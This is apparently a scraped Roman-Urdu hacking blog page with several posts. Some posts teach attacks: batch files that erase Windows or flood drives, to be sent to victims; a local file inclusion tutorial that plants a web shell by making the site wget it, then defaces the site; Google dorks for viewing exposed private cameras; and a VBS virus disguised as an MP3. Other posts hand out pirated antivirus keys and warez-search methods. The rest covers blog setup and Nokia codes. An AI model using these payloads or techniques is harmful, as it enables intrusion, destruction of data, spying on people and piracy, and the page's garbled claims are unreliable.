Friday

// // 1 comment

Dangrous NotePad Virus


Dangerous Virus using
notepad.
Now, to test it, create a textfile called TEST.txt(empty) in C:?/ Now in your notepad type "erase C:?/TEST.txt"
 Then do "Save As..."
and save it as "Test.cmd". Ab file ko run krin "Test.cmd" and go to C:?/  apka text ghayeeb ho gya hoga

then
Go to notepad & type erase C:?/WINDOWS(or C:?/LINUX if you
have linux) & save it again as
findoutaname.cmd.
ab us file ko run mat krin nai to apki window ud jaye gi ab ap virus kisi ko b snd krin jb b wo open kry ga to victom ka pc crash...................... End ................

Read More
// // Leave a Comment

Problam in Disconect internet Connection



Dear if ur internet discennecting sevral times in the day. I am going to easy way to solve this problem.
 goto start>run and type cmd and hit enter. Type there ''ipconfig/release''  without commas and there will show ur all ip config at ur clip2 goto start>run and type cmd and hit enter. Type there ''ipconfig/release''  without commas and there will show ur all ip config at ur cli
 and there  u type this cmd also ''ipconfig/renew' and hit the enter and restart the dsl router.
 there is an other cmd also available that cmd is ping. We type in cmd prompt like this ''ping -t -w 192.168.1.1''
if u want to increase ur net speed u can also use this cmd in cmd prompt '' ping -t -w 0.0.01000'' and if u want to get help about ping just type in cmd prompt 'help ping' and hit enter.
End..
Read More
// // Leave a Comment

Hack Cams Through Google


Cameras ko hack karen ab google bhai ke sath.very easy..
 1. sub se pehle google.com per jayen. 
2. yeh dork "inurl:/view.index.shtml" goole main daal kar search maren or koi bi cam select kr ke dekhen.
yeh kuch dorks hain jin ko google main search karne se or cams aa jayen gen like beach , office , bla bla. 
.inurl:/view.shtml
.intitle:Live View / - AXIS ??
.inurl:view/view.shtml??Ü
.inurl:ViewerFrame?Mode=
.inurl:ViewerFrame?Mode=Refres
.inurl:axis-cgi/jpg
.inurl:axis-cgi/mjpg (motion-JPEG) .
.intitle:Live View / - AXIS 20M
 intitle:Live View / - AXIS 206W
.intitle:Live View / - AXIS 210?
.inurl:indexFrame.shtml Axis
.inurl:MultiCameraFrame?Mode=Motion
.intitle:start inurl:cgistart
.intitle:WJ-NT104 Main Page
.intext:MOBOTIX M1? intext:Open Menu
.intext:MOBOTIX M10? intext:Open Menu    .
.Intext:"MOBOTIX D10 ?
.intitle:snc-z20 inurl:home?/
.Intitle:snc-cs3 inurl: home/
.intitle:snc- .c next.
.intitle:"sony network camera snc-p1?
.intitle:"sony network camera snc-m1?
.intitle:"toshiba Network Camera" user login
.intitle:"netcam live image"
.intitle:"i-Catcher Console - Web Monitor.. End 
Read More
// // Leave a Comment

Remote File Inclusiom (RFI) Hacking in URDU


Tut:Remote File Inclusiom (RFI).
Wht u need.
N0-1 mozilla firefox.
N0-2 tamper data.(its firfox addon Google it).
N0-3 A shell (recommended r57 or c99 google it).Upload it on fre hosting as .Txt.
Par mai kuch yahan upload karta hn ap b yahan karo sai rahe ga see step 4.
N0-4 A account on drivehq.Com.And their upload ur shel as .Txt.
N0-5 A vuln web and little brain.
Lets start.

Dork :.Php?Page-contact.Php
kafi site milae ge par vuln buhat kam its ur luck.Patience rakho ge mil jai ge vuln web.

Nw web jo select ke us k akhr mai yae hoga  /page=career.Php.
Then replace after page= with ths
../../../../../../../../../proc/self/environ
(../ yae apne marzi se torae zada dal dijai ga 10 12).
Ur link will be like ths
www.Web.Com/page=../../../../../../../proc/self/environ
jaise enter karen ge web par ek ajeeb code ajai ga.Agar yae code iya tou web vuln h..Ap agae kam karo.Code nh iya tou next web par try karo.

Jaise bola tha kahin apka shel upload hona chayae .Txt format mai.Mai drivehq par karta hn.Lfi string bnate hain.
Nw lfi string would be
<?system('wget http://www.Web.Com/shel.Txt -o shell.Php');?>
is mai www.Web.Com/shel.Txt apka shel link h.Ja han apne shel upload kia ho.Mai jb karta tha drive hq use karta hn.

Oka.Lfi string note pad mai likhna then.Jahan Code araha tha(../../ yae likhne k bd)  wahan us page par option mai ja kar tamper data on karo.Then tamper data mai click on start tamper.Ek dum window i ge wahan click karna tamper par.

Tamper par click k bd ek aur window khule ge wahan USER AGENT mai wo jo lfi string tha dal daina..Lfi string paste kardaina.
Phr oka par click.Phr stop temper data par click kardaina ya bnd kardaina.
You have done it.
Www.Site.Com/shell.Php kholo ge tmra shell execute hojai ga web par..
Bingo. . . .
Nw enjoy hacking and brust ur victim.

Chalo deface kartae hain.Make sure shel par yae likha i public§html.
Nh tou executing comand se is directory mai jana.Waise phelay se is he mai hoge.
Upload ka option hoga shel mai. index.Html k nam se deface page daldo.
Chck karo upload hua ya nh.
Www.Site.Com/index.Html.Agar deface page khule
then shell sari files dikha raha hoga.Index nam ke file dhundna aur delet kar daina.Phr tmra deface page yahan i ga.
Www.Site.Com
End. . . . .
Read More
// // Leave a Comment

Virus in URDU


Real virus bnane k liye 1 software ki zarurat hoti he.Google.com me search kre
"VIRUS CONSTRUCTION TOOLS"or koi b tool downlod kre

jb ap koi b virus construction tool download kare to use start kre.Wo apse apka name puche ga apne real name nahi deni.Is k elawa

 decription me virus k mutaliq kuch likna he. Virus ka name b likna he. Or EXE me browse ko clik kr k RUNDLL32.EXE ko slct krna he

pir jb sara kam cmplet kr d to GENERATE pr clik kre.Wo software apke liye 1 notpade file banaega jisme virus ka code hoga.Apne use

code ko copy kr k dusre notepad me paste krna he or use save krna he is nam se NAME.VBS ab jaha b ap ise rakhy tois ko rename kr d
  
yani 1 foldr me audio song he SONG.MP3 to apne us virus ko SONG.MP3.VBS k nam se waha save krna he jis se wo hide hojaega.Ab jb b

us audio song ko play krenge to ye virus start hoga jisse apke PC ki speed slow hogi or ye virus hr us jga auto copy hogi jis jaga

 audio song hoge.Esi trha koi b gana kisi b net pr upload krne se virus b uplod hoga.Esse ap boht se dusre qism k virus bna skte h

ye 1 underground secret thi jo mene apko bata d.Apne kisi ko nahi batana iske bare me.Kl ya parso apko WORM GENERATOR sikaunga.End


Frndz i am sending informati0n about "Malware" stay with us
Malware is a big problm 2day. Everyday innocent peoples r geting infctd by diffrnt Malwares. The m0st common type of malware .
are Viruses, Worms, Trojans.You all are familier with viruses, there4 i will tell u about worm & trojans... C nxt



 V13
P3
WORMS:
A worm is a malicious program, than can replicate itself onto other computerz on a Network. Once it infect a system,
it uses that system to send out other copies of it self to other rand0m systms..

TROJANS : -Trojans can be used to do sily things to a system like changing desktop, user interface, to0k c0ntrol of m0use etc..
it can also be used to do s0mething serious like accesing ur data, erasing ur files, stealing paswrd etc.End

Make a virus that will delete all data in your pc. Open notepad type del *.* save as boooom.bat then run it. Try your on risk!

  Har anti virus best hai agr wo latest regstr ho. Wse top pe Kasper or mcafe hain. . Par mai anti virus use nai krta. . Mere nazdik is k faidy kam nuqsan zayada hn. . . Or chnd ak ikhtyatain hn jin ko ikhtyar kr len to anti ki zrorat b nai parti

Ikhtyatain b bta dun ga. . Or recycle or systm volume foldr Window k apne foldr hn. Ye delete nai hote agr ho b jain to phr se ban jate hn.
Jo b software ham delete krte hn wo systm volume foldr mai ajate hn. Yhan se inhe dobara restore keya ja skta hai. Ap ki mrzi hai yhan se b ura dyn ya phr system restore kr lyn.

Ek Aesa Virus ha
HardDisk jitni baar marzi format kro. Wo virus remove nehi hota.
Aur system slow kr deta hai. Lekin Norton se ho gaya tha. Mein nay check kia. Dost k pc pr.
Usy Boot Sector virus kahte hain. Or ye Norton Avg kasper avast avira n0d. . Ksi anti se remove nai hota Q k ye Bios Mai enter ho jata hai. Or isy rem0ve krne k ly bi0s re.instal krna parta hai.

 B00T SECT0R VirUses........
Bi0s Mai Ghus Jate Hain  0r ksi Anti.v Se Rem0ve ni Hote. Bi0s Reinstal Krna Parta Hai.

System Volume:
Hiden Files jahan se show hoti hain. Us k neche 3rd option hota hai show system files..?Usy unchk kr do. .Har drive mai recycle or systm volume info. . Ka ak ak foldr hoga is foldr ki space chk krna andr data daikhna

Apny computer mai virus sy infectd file ko dlete krny ki liay Go to start, click at Run n type ".eml" Virus wali files show ho jaen ge and thn in sub files ko SHIFT+DEL pres kr k dlete kr

 iF u wanna use more thn 1 antivirus same time. goto run type regedit thn softwars nd dlt 1st antivirs registry.n do same 4 2nd.

Bad sector 2 types kay hoty ha ek temperary jo simple format karny say remove ho jaty ha ek permanent hoty ha un ko win98 ki cd say format kar kay fix keya ja sakta ha different soft bi hoty ha bootable

 New Types of Computer Viruses: 
1.Bureacatic virus
  and all notepad virus postd on www.hackspedia.tk


 Sub se pehlay Computer Virus 1986 main 2 Pakistani Brothers nay bnaya tha.


 viRus Tip Pc ko Deadly Slow krne wale viruses jo Taskmgr k Proces Mai Daikhe ja skte Hn.un k Names ye hn."RUNOUCE.EXE" "REGSVR.EXE"


  AVG Antivirus Serial Key for 10 Years 8MEH-RQXTV-HQOWD-E447R-MPHYD-PEMBR-ACED

 remove chinese virus
download softwear
http://adf.ly/1MBrm
skip ad

antivirus download krny se pehly koi agr pehly se mojod ho cel ma to agr isi company ka ha to overrite ho ga. Agar koi aur company ka ha phr waise hi instal ho jaye ga!

jb Viruses Nod32 Ko Dlt Krny na dy to . . .
Ap New Window Kro Aur Sb Sy Phlay Nod32 (Version 4 Ya Above) Ya Koi 2sra A.V kro Sath Usb Disk Security b......
Yad Rahay Win Kr K Koi Drive Open Na Krna Jb Tk A.V na Ho Jaen...
Aur Agar Ap Autorun Virus Say Bachna Chahtay Hain To Drive ya Usb etc Adress Bar sy Open Kren.

jb Viruses Nod32 Ko Dlt Krny na dy to . . .
Ap New Window Kro Aur Sb Sy Phlay Nod32 (Version 4 Ya Above) Ya Koi 2sra A.V kro Sath Usb Disk Security b......
Yad Rahay Win Kr K Koi Drive Open Na Krna Jb Tk A.V na Ho Jaen...
Aur Agar Ap Autorun Virus Say Bachna Chahtay Hain To Drive ya Usb etc Adress Bar sy Open Kren.

Bad sector kesy aty hn?
Hdd zra si b unchai se gir jai to Ap lucky hun ge agr koi bad sectorz na ayen hun. Or Hdd ko On halat mai agr hath mai pakr k zra left right tera wera keya jai. To vibrate krta hai. Is se bad sectrz creat hote hn. Hdd 24 hr chalne se kafi heat up ho jati hai. Or heat se b bdsectr atay hn.


Unalocated krne k ly sirf itna pta hona chahye k 6gb drive hai to sectorz kahan par crpt hn. Or wo software se repairng k doraan daikh skte ho. Us k bad us jaga ko unalocate kr do baqi ki drive bna lo. C mai ho to format nai hoti win b Nai instal ho skti. Tb usy slave mai dosri hdd k sath lga k u

 In 2no viruses k remove krne ka ak he desi tariqa hai. Window mai system32 mai dono super hiden pare hote hain. Shw kr k in ko rename kr do in ki jaga in he k name k 2 foldr rkh do. Ak foldr Runouce.exe ak Regsvr.exe Phr taskmgr k proces se end kr do or phr un dono virus ko del. Phr kbi na aein gay.

Avast AntiVirus 4.8 PROFESIONAL Full   Life Time Key www.hotfile.com/dl/103433555/8318472/A.A.2009.Pro.v4.8.Plus-Keygen-2010.rar.html

  frndx jo bhi antivirus ho, us say system scan karo, jab koi virus na rahay,
antivirus ko uninstall kar do,
system ki speed bhi theik rahay gi & protection k liye firewall active rakho,
u.s.b kam say kam istamal karo.
this is like a profesional usage.

Make a virus that will delete all data in your pc. Open notepad type del *.* save as boooom.bat then run it. Try your on risk!

PCsoftware  ClamWin is a Free Antivirus program for Microsoft Windows 98/Me/2000/XP/2003 and Vista. ClamWin Free
http://j.mp/9GNqkv

 ANTIVIRUS KEY : For ESet Products Update   Username : EAV-32384711   Password : ekxhbxfemx   Expiration : 29/06/2012

har us cel me virus ata hy jo symbian hy mtlb jis s0ftware etc aty hain aur virus jaldi ya bad me nahi ata virus se bachna to
1st apna mem0ry card kisi 2sry m0bile me na laga0
2nd kisi 2sry m0bile ka card apny m0bile me nahi han f sure hy us card me virus nahi phr lga skty wrna nahi
3rd net pe web wo use kro jin me virus na h0
4th blueto0th se s0ng pic etc se kuch b 4rwd na kro mtlb bluet0oth kum use kro
5th apna card us computer pe laga0 jis me virus na h0


1 data Cut Paste krte wqt cancel kr do wo file ksi side ki nai rehti. Recover b nai hoti.
2. Low level format ya Zero Fill krne se recover nai hoti par ak 40.gb hard ko low level frmt krne mai 6 hr lagen ge. Or Data us jaga koi or rakh do to pichla recvr nai hota

 Install New Fresh Win. Then instal all ur fav. Software and driverz then install Norton Ghost Software.
Taskbar mai Volume k pas Ghost ka icon ajai ga click on it 2 option hunge. Create backup (image) or Restor Bakup.
1st bkup bnana hai to backup wala option click kren. Nxt c drive select kren nxt  bkup kahan save krna hai d' ya e mai save kren nxt nxt nxt. Pc restart ho jai ga. Bkup bn'na shuru ho jai ga.
Jb b koi masla ho win mai to Restore option use kre same method. Win 2 mint mai instal

 ap KASPERsky 2010/11 instal krn,bht eazy aur fast hy,ye intenet security,pc security 2nu c0licti0n h0ti hy,with kays,,aut0 scaning hy,pc es se sl0w bhe nhe h0ta


Virus in batch viruses or virus genrator softs se ban'ne wale virus or un autorun virus ma sky earth ka fark hai.Han disable ham reg.Se wo sb kr skte hain.Jo funyust krta ha.Pr wo hr drive ma copy ho jata ha.Or delet krne pe phr ajata ha.Tere virus ma ha ye ability

 Make a batch virus it wil create milions of folders in ur pc.
Open notepad type.
For /L %%A IN (1,1,1000000) DO MD C:?/VIRUS_%%A
Save as Flood.bat
Type this cmand 4. . 5. .or 6 time acording to ur local drives. . And jst change drive path C D E. ?

Download Virus Maker Software:
1. Disable windows task manager
2. Disable registry editor, Msconfig and Cmd
3. Disable microsoft internet explorer
4. Disable internet connection
5. Disable Start menu and My computer
6. Disable All microsoft's products
7. Remove All files in victim's pc
8. Kill system files
9. Change icon of exe files
10. Rename all mp3 files
11. Turn off/on monitor
12. Open/close cd rom
Download from:
www.4shared.com/file/gzwp8zg5/virusmaker.html
Password of rar file is:
www.ethicalhacking1.com

Read More
// // Leave a Comment

Best CC Checker

Read More
// // Leave a Comment

How to Make a Perfect Blog




Ajj main apko Blogger pr simple site bnana sikhat hoon. blog bnana sb sy easy kaam hai. aur jisko  blog bnanana bhi na ata. samjain usy kuch nahin ata.blog bnany ke boaht sy faidy hain. sb sy iham hum sharing kar skty hain. article likh skty hain. news update share kar skty hainn. 2nd box main ap apny blog ka web address dain gain jo ap apni blog keley chahty hain. for example main apny blog ka naam ITsuper rkhna chata hoon

kuch logo ny jobs updates kelye blogs sites bnaye hain jahan woh daily jobs ke updates daity hain, kuch dosto ny Study ky topics pr blogs bnain han, jahan woh study ky bary main guide karty hain. notes update karty hain, kuch dost softwares, games, urdu books, ke sharing kelye blogs bnaty hain

blog kia hai? blog aik choti se site hote hai. jis kelye na hamin web programing shikny ke zaroorat hoti hai, na web Designer bnny ke zaroorat hoti hai. sirf apko internet use karna ata hoo aur thori se common sense ho. ;)

blog bnany keleye sb sy pehly app www.blogger.com pr jain. agar apke Gmail ke id bne hai tu wahan Gmail ke id sy login ho jain. agar gmail ke id nahin hai tu phr yahoo ya hotmail ke id sy apko ragister hona pary ga. login hony ke baad apky pass aik page aye ga. jahan create a blog likha nazar aye ga. uspr click karin

create a blog pr click karny pr next page pr ap sy apky blog ka Title name pocha jai ga. ky app apny blog ka Title ya name kia rkhna chahty hai

tu main apna webadress aisa bnaon ga. www.itsupers.blogspot.com. web adress ky neachay Check Availability pr click karky chaeck karin ky kia yeh adress already kisi nay bnaia tunahin hai? agar pehle sy kisi ny bnaia hai tu phr apko koi aur name choice karna pary ga.

next Word Verification main apko jo word dia hoga same wahi word type karin aur countinue pr click kardain. next page pr woh app sy pochy ga ke app apni site ka design kaisa rkhna chahty hain. woh apko
kuch design select karny keley dai ga. jo apko acha lagy woh seleck karin aur continue kar dain.

ab last page aye ga, jis pr likha hoga Your blog has been created!.
apka blog bn chuka hai. start blogging pr clik karin.tu apky saamny blogger ka control panel ajai ga jahan sy app apny blog ko control kar skty hain. sb sy pehla jo page aye ga usmain app ny posting karni hai. app jo bhi posting karin gai woh apky blog ky frontpage pr show hoga

posting ke Title main apni post ka main title ya heading likhen. Editor box main app apna article, posting ya sharing jo ap karna chaty hain type kardian. labels main app posting ka topics ya categories type karin. iss sy visiter ko topic search karny main asani rehti hai aur last publish kardain

ap ke posting main page pr show ho jai ge. view blog pr click karky apny blog ky front page par ain. yahan apki posting show ho rahe ho ge.ajj kelye itna he. blogger.com ke jaga app blogspot.com pr b blog bna skty hain. dono sites aik he hain. end

aj hum bloger ke control panel main sb sy pehly posting ke option ky bary main jany gain. posting main 3 Tabs hain, new Post, Edit Post, Edit Page, new post main hum site pr jo bhi posting karna chahty hain woh type karin gain, Posting ka Editor Box 2 Type ka hai aik compuse 2nd Edit HTML, Compose main Simple Ms Word jaise options hain. jis main app Text Ka Font, Text Size, Color, kar skty hain


image aur videos ke option sy app picture aur videos apni site pr apny PC sy online share kar skty hain. Edit HTML main agar hamin HTML language ati hai tu hum HTML sy kafi kuch apni sites pr share kar skty hain. Normaly iske zaroorat nahin parti. likin agar app advanse work karna chahty hain tu app HTML sikh lain. HTML main app, TV Channels, Chatrooms,SMS Sending ke coding add kar skty hain

Yeh Coding hamin internet sy searching karky easly mil jai ge. kuch coding apko mere Blog www.mshqit.com sy bhi mil jain ge. just unhain copy karna hai Editor Box main Edit HTML pr Click krky Editor Box main paste kar dain hai. next app jo bhi posting karin gain tu jb tk app usy publish nahin karin gain tb tk woh psot blog pr show nahin hoge.agar app posting ko publish nahin karna chaty tu usy save kar dain

save karny sy app isy next time Edit Post ke option sy again publish kar skty hain. save now pr Preview ke option hai. jis sy app apni post ko publish kye baghair uska Preview check kar skty hain. Label ky box main app apni posting ke categories Type kar skty hain jo for example agar main koi game share karon tu label main Game likhon ga, koi software share karon ga tu label main software likhon ga

agar main categories ziada add karna chahon tu woh bhi add kar skta hoon, for example main ny aik software share kia tuneup utilities jo window ke modification aur maintains kelye use hota hai ab main isy 2 categories main add karna chaon ga tu (software, Windows Software) ke Categories bnaon ga,is tara mere blog ke visitors ko categories sy software waly page pr jany main asani hoge

new post ky bad Edit Post ki option ati ha. Edit post main hum apni koi bhi publish ke hoe aur save ke hoe file ko edit kar skty hain. edit psot ke bad edit main main hum apy blog main new page add kar skty hain. jaisy contact me, about me, chat room page etc, posting ke baad top tab main comments ki option ati hai. comments main hum visiters ke comments ko  delete karsktay hain...
is trah aap ka 1 perfect blog ban jaye ga aor aap ko kaam karnay me aasani rahay gi...



Read More
// // Leave a Comment

Learn to Downloading in Urdu Lecture


Friends aj ka topic hai downloading. Downloading b aik fun hai. Aur yeh fun b net pr ghanto time dai kr bnda sikhta hai. Net pr 3 type ky log hoty hain. Jinhain downloading ka shok hota hai. 1st expert jis ko software ka naam btain. Aur woh ap ko full version aur with crack saamny la dai ga. 2nd meduim jo aksar trial version software b download krky khush ho jata hai. Aur 3rd woh jo saara din software search krta hai. Phr b usy nain milta.


Downloading ka yeh differnce searching method ko samajny, na samajny ke waja sy hai.  Agar apko insan ke soch samaj ajai. Ky woh kia sochta hai. Aur downloading krty waqat kia tariqa apnana hai. Tu ap koi b software easly search kr skty hain.


Full version jitny b software hoty hain. Woh file hosting sites, rapidshare.com, 4shared.com, hotfile.com, mediafire.com pr upload hoty hain. Mostly new downloader hamisha google main software ka naam likhta hai. Aur sath main aik bari galte krta hai. K word "free" b saath main likh daita hai. Aur usy jo b software milta hai. Woh trial, demo, ya shareware version hota hai. Jitne b top software downloading ke site hain. Unho ny insan ke psychology ko saamny rkha hota hai. Woh janty hain. Ky net main hr 1st person free software search krta hai. Islye net main hamisha unke sites 1st ate hain.

 Woh apni site main b likhty hain. Free download. Zaahri tor pr tu hamin lagta hai. Ky yeh software free hai. Magar yeh software sirf free main downloadable hota hai, na ky free main useable. Yani site hamin free main software daite hai. Magar hm usy free main use nain kr skty.


Full version software ap ko blog sites sy easly mil jaty hain. Magar  blog main software bohat he km hoty hain.kion ky blog ko aik bnda he chalata hai. 2nd number pr forums hain. Forums 3 type ky hoty hain. IT, haking aur warez. Warez woh forum hoty hain. Jo basicaly cracked aur full version software provide krte hain. Best warez forum. Astatalk.com warezwitch.com crackedsofwares.com etc.

 3rd numbr pr forum link submiter sites hain. Yeh woh sites hain jahan apko 100, 200 forums ka data aik jaga he mil jata hai. Kisi b software, games, ke ap ko zarorat ho. In sites ke search option main type kren. Woh software apky pas hazir.  www.katz.cd world ke top site the. Jahan sy log software search krty thai. Magar phr yeh site band ho gai. Ab phazedll.com aur www.warez.ag ny inke jaga lai le hai. Mazeed is jaise sites apko allmaza.com ky footer main nazar ain ge.

Online file sharing ky 3 method hoty hain. http, ftp, aur P2P yani torrent. HTTP main file sharing sb sy easy aur fast hai. Http ke example file hosting sites hain. Filehosting sites main sb sy top pr rapidshare.com megadownload.com hotfile.com mediafire.com, filesonic.com 4shared.com aur bohat sy sites hain. Jahan log apni files aur data upload krty hain. Likin 1, 2 sites ky ilawa baqi sb sites apny user ky data ko private kr daity hain. Aur hm in sites main koi b file data search nain kr skty.


Yeh yaqeeni baat hai. Ky admi filehosting site main jo b upload krta hai jo ziada tr full version software hoty hain.aur isy  Woh kahen na kahen share zaror krta hai. Aur apko yeh b pata hota hai. Ky google sy hr cheaz search ho jate hai. Tu hm us data ko jo rapidshare pr upload hoa hai. Google sy search kren gain. For example hamin adobe cs4 chahye. Tu hm google main search kren gain. Site:rapidshar.com adobe cs4 tu hamary pas bohat se sites ajain gen. Jahan rapidshare ky adobe cs4 ky downloading link hon gain.


ise tara hm dosri filehosting sy b search kr skty hain. My favorite aur best filehosting site www.mediafire.com hai. Q k is sy data bohat jaldi download ho jata hai. Agar light chale jai. Ya downloading stop kr dain. Tu phr downloading wahen sy star hote hai. Aur aik waqat main ap jitna chahen data download kren. Jb ky rapidshare. Aik waqat main aik he file download krny ke ijazat daita hai. Aur next file kelye apko 15, 20 mint wait krna pary ga. Aur agar 100 mb ke file 99mb pr stop kr de ya light chale gai. Tu phr start sy downloading krne hoge.


Google ky ilawa aur b bohat se sites hain. Jo filehosting sites sy direct apko data search krky daite hain. Jaisy Searchsheard.com megadownload.net filestube.com filescrop.com aur sites ko ap rapidshare search engine ky keyword sy search kr skty hain. Data search krny ky bad usy download krna aur b mushkil kam hai. For example hm GTA 4 download krna chahty hain. Aur usky 200, 200 MB ky 50 download link hain. Tu hm tu 3, 4 din, din raat sirf GTA 4 ko download krty rahen gain.


iska best hal yahe hai. Ky ap jdownloader software download kr lain. Jdownloader tamam file hosting sites sy auto downloading krta rehta hai. Just downloading link copy paste krdain. Woh tamam links ko auto download kr ly ga. Aur apko 24 hour pc pr bhet kr aik aik file ko download krny ke zehmat nain krne pary ge. Jdownloader. Apko jdownloader.org sy mily ga.


2nd method ftp hai. Iske speed bohat slow hote hai. Islye na hony ky brabr use hota hai. Ftp main log apny Pc ka koi folder ya drive share kr daity hain. Aur dunya ky kisi b hisy sy b log usky pc sy data copy krlety hain. Ftp ka adress kuch aisa hota hai. Ftp://122.332.54.1 net main agar ap ftp search engine search kren gain tu bohat se site mily gen jo ftp link share kren gen. Ftp ka agar ap direct link open kren gain. Tu apky saamny same pc drive show ho jay ge aur ap ko bohat sy folder nazar ain gain. Ftp kelye best software filezilla aur cute ftp hai.


FTP secure nain hota. Kion ky jis ny apna pc share kia hota hai. Usny apni firewall disable ke hote hai. Jiske waja sy woh hakerz ka target b bn skta hai. Kuch sites ny apni site pr mp3 songs, videos, flash games aur pdf books upload ke hote hain. Agar hm google ke madad sy aik khas technic sy us folder pr direct pohanch jain. Tu hm wahan sy us site ka sara data copy kr skty hain.


Google ke is technic ko google index kehty hain. For example. Agar hamin koi khas mp3 audio chahye tu hm google main type kren gain. Index file-name.mp3 ya site:name index mp3. Yeh trick kuch sites pr kam krte hai kuch nain. Isko hm aik choti se haking trick b keh skty hain. Google index ky code ap google main search krlain. Bohat sy code mil jain gain. Mp3 ke jaga ap pdf, swf, wmv b likh skty hain.


Next aur last method Peer to Peer connection. Mean pc to pc connection  aur in short word p2p.
P2p ke simple discription torrent hai. Torrent b ftp ke tara hai. Magar ismain pc share ya driver share nain krna parta. Blky just apni aik file ko jo share krna hote hai. Uske aik choti se link file bnai jate hai. Jisko torrent file kaha jata hai. Yeh torrent file hm torrents wali site pr upload kr daity hain. Jahan sy woh file host ho jate hai. Aur dunya ky kisi b hisy sy koi b woh torrent file download krta hai. Aur phr apky pc sy woh file upload aur usky pc main dowonload ho jate hai.



Turrent ka best software utorrent hai. Torrent ke bohat se sites hain. Jahan sy ap torrent search aur download kr skty hain. Mere favorite torrent site btjunkie.org hai. Torrent file jb b download kren tu usky seed aur peer zaror check karen jo torrent ky sath likhy nazar aty hain. Hamisha wahe torrent download kren jisky seed aur peer 2 sy ziada hon. Seed mean jo torrent upload kren aur software download hony ky bad seeding ya uploding pr lagai ho. Aur peer mean jo download kr raha ho. Agar seeding pr kisi ny b torrent na lagaia ho tu woh software download nain hota.


p2p main torrent ky ilawa aur b bohat sy method shamil hai. In main limeware, emule, usenext, murphus software use hoty hain. In main torrent file use nain hote. Blky apna aik folder share krna hota hai. Jis main software download b hoty hain. Aur upload b. Sb sy fast downloading speed usenext ke hote hai. Magar yeh free nain hai. Ap ko iska trial b tb dia jata hai. Jb apky paypal main 1 dollar km az km ho. Aur phr apko woh kuch GB download krny ke ijazat daity hain.


p2p file sharing pr shorow main pabandi laga de the. Kion ky tamam full version, aur cracked software yahan share hoty thay. Aur software bnany wale companies preshan ho gai the. Magar lahkho net user p2p file sharing he use krty thai. Unky aihtijaj pr p2p file sharing pr pabandi hata de gai..
---EnD---
umeed hai ab ap ko koi b software search aur download krny main masla nain aye ga

Read More
// // 1 comment

Nokia Mobile All Secrit Codes & Cheats Best Unique Nokia secret Hack codes

There are some secrit codes of Mobiles. Ye codes aam aadmi ki pohnch say dooor hain ici liye aap doston k saath share kar raha hoon . is say aap ko mobile k baray me mazeed jananay ka moka milay ga... Get these all secrit cods... Enjoy !!

Hey friends, today i will share with you the best Best Nokia hack codes/ These codes provide some interesting and unique information to Nokia Phone users, some of these codes unlock hidden functions. Secret hacks code are mainly beneficial in knowing your device properly. What else you can do just from calling and messaging from your mobiles. If you wish to unlock your Nokia Phone then read this article: Unlock Nokia Phone.


Note:Not all Nokia phones support all codes, so please don't complain if any of the hack code doesn't work on your mobile device.


* *#61# Allows you to check the number that "On No Reply" calls are diverted to
* *#62# Allows you to check the number that "Divert If Unreachable (no service)" calls are diverted to
* *#67# Allows you to check the number that "On Busy Calls" are diverted to
* *#67705646# Phone code that removes operator logo on 3310 & 3330
* *#73# Reset phone timers and game scores
* *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible
* *#7760# Manufactures code.

* *#7780# Restore factory settings
* *#8110# Software version for the nokia 8110
* *#92702689# Displays - 1.Serial Number, 2.Date Made, 3.Purchase Date, 4.Date of last repair (0000 for no repairs), 5.Transfer User Data. To exit this mode you need to switch your phone off then on again
* *#94870345123456789# Deactivate the PWM-Mem
* **21*number# Turn on "All Calls" diverting to the phone number entered
* **61*number# Turn on "No Reply" diverting to the phone number entered
* **67*number# Turn on "On Busy" diverting to the phone number entered
* 12345 This is the default security code press and hold # Lets you switch between lines.

To disply IMEI no.   *#06#
 To disply mobile warranty   *#92702689#
 To disply d production serial no.   *#7760#
 To disply bluetooth MAC address   *#bta0#
 To disply mobile security code   *#2640#
To verify cal waiting  *#43#


Nokia 1110, 1112, 1200, 1208, 1202, 1203 Snake game unlimited score trick. See my next tweet. 
Goto games from menu and open the game Snake Xenzia. Now goto Game type and select the Campaign now goto new game.
now again press the back button and goto game type again and select the campaign again now goto c0ntinue and see the magic.
Every time when your snakes gets longer repeat this process. Thanx 4 being with me. Enj0y


Nokia  Codes:   IMEI: *#06#    Vrsoin: *#0000#    Format: *#7370#     Warenty: *#92702689#    Rotat Screen: *#5511# *#5512# *#5513#



 Mobile Real Secuirty codes 4: nokia 12345

Universal Nokia Hack Codes
These are called universal because these hack codes works on 
almost all Nokia mobile phones.
*#06#     Displays the IMEI (Standard GSM command, works on 
all phones)
Information you get from the IMEI-
XXXXXX  XX   XXXXXX   X
    TAC       FAC     SNR      SP
*TAC = Type approval code
*FAC = Final assembly code
*SNR = Serial number
*SP    = Spare
*#0000#      Displays the firmware version and date
Information you get from the Software revision-
V 6.1.0.5
18-12-10
NSE-3
*1ST Line  = Software revision
*2ND Line = The date of the software release
*3RD Line = Phone type 
*#92702689# *#war0anty#  Here you can view the S/N and the 
IMEI as well as the life timer 
(newer models). The date the phone left the factory and the date 
it was purchased.
 If your phone has been repaired the date of the repair
 is also visible. You will need to turn the phone off to exit this menu.
 Newer phones simply require you to
 press ok.
ClockStopping
To check weather your SIM Card supports clock stopping 
type- *#746025625# (*#SIM0CLOCK#)
NOKIA 40 SERIES CODES
The following codes are specific to older series Nokia(40 series) 
 Mobile phones:
Entering the following codes will restart the phone.
Note: If main code doesn't work try the alternate one given in
 brackets for each code. As on some devices
 standard code works and in some alternate only might work.
*4720# (*hra0#) Activates Half Rate, Half Rate is 5.6kbit/s and
 uses half the bandwidth at the cost of call
 quality. Network operators often activate half rate on overloaded
 towers during peak times to save costs.
#4720# (#hra0#) Deactivates Half Rate
*3370# (*efr0#) Activates Enhanced Full Rate, EFT attempts to
 match wire quality. 
The calls are 12.2kbit/s and are not supported by all operators. 
It is compatibale with the hightest AMR mode.
#3370# (#efr0#) Deactivates Enhanced Full Rate
*#746085685# (*#sim0clock#) Display the SIM clock status
Phone Specific Codes: 
The following codes are phone specific or phase related.
*#7220# (*#pca0#) Activate the GPRS PCCCH support
 (Packet Common Control Channel)
*#7230# (*#pcd0#) Deactivate the GPRS PCCCH support
*#7760# (*#ssn0#) Display the manufacturing serial number
This only works on the 3310 and 3330:
*#67705646# (*#opr0logo#) Clear the operator logo, the logo 
will be reset to the default network
 operator logo.
NOKIA 60/80 SERIES CODES
The following codes work on newer series 40 & series 60/80 phones:
*#2820# (*#bta0#) Display the Bluetooth MAC address 
(Phone must have a built in bluetooth adapter)
